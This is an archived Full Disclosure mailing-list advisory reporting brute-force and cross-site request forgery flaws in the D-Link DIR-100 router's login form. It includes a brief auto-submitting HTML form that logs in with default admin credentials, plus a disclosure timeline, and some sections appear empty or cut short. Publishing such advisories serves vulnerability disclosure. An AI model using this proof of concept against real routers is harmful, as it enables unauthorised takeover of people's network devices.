lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 25 Jun 2017 23:58:13 +0300
From: "MustLive" <>
To: <>,
Subject: [FD] Vulnerabilities in D-Link DIR-100

Hello list!

There are Brute Force and Cross-Site Request Forgery vulnerabilities in 
D-Link DIR-100.

Affected products:

Vulnerable is the next model: D-Link DIR-100, Firmware v1.01. All other 
versions also must be vulnerable.


Brute Force (WASC-11):


No protection from BF attacks in login form.

Cross-Site Request Forgery (WASC-09):

Lack of protection against Brute Force (such as captcha) also leads to 
possibility of conducting of CSRF attacks, which I wrote about in the 
article Attacks on unprotected login forms 
It allows to conduct remote login. Which will be in handy at conducting of 
attacks on different CSRF and XSS vulnerabilities in control panel.

D-Link DIR-100 CSRF.html

<title>D-Link DIR-100 CSRF exploit (C) 2017 MustLive.</title>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/postlogin.xgi" method="post">
<input type="hidden" name="authen_username" value="admin">
<input type="hidden" name="authen_password" value="admin">

Cross-Site Request Forgery (WASC-09):

Change admin's password:



2015.05.02 - announced at my site about vulnerabilities in DIR-100.
2015-2017 - informed developers about multiple vulnerabilities in this and 
other D-Link devices.
2017.02.04 - disclosed at my site (

Best wishes & regards,
Administrator of Websecurity web site 

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists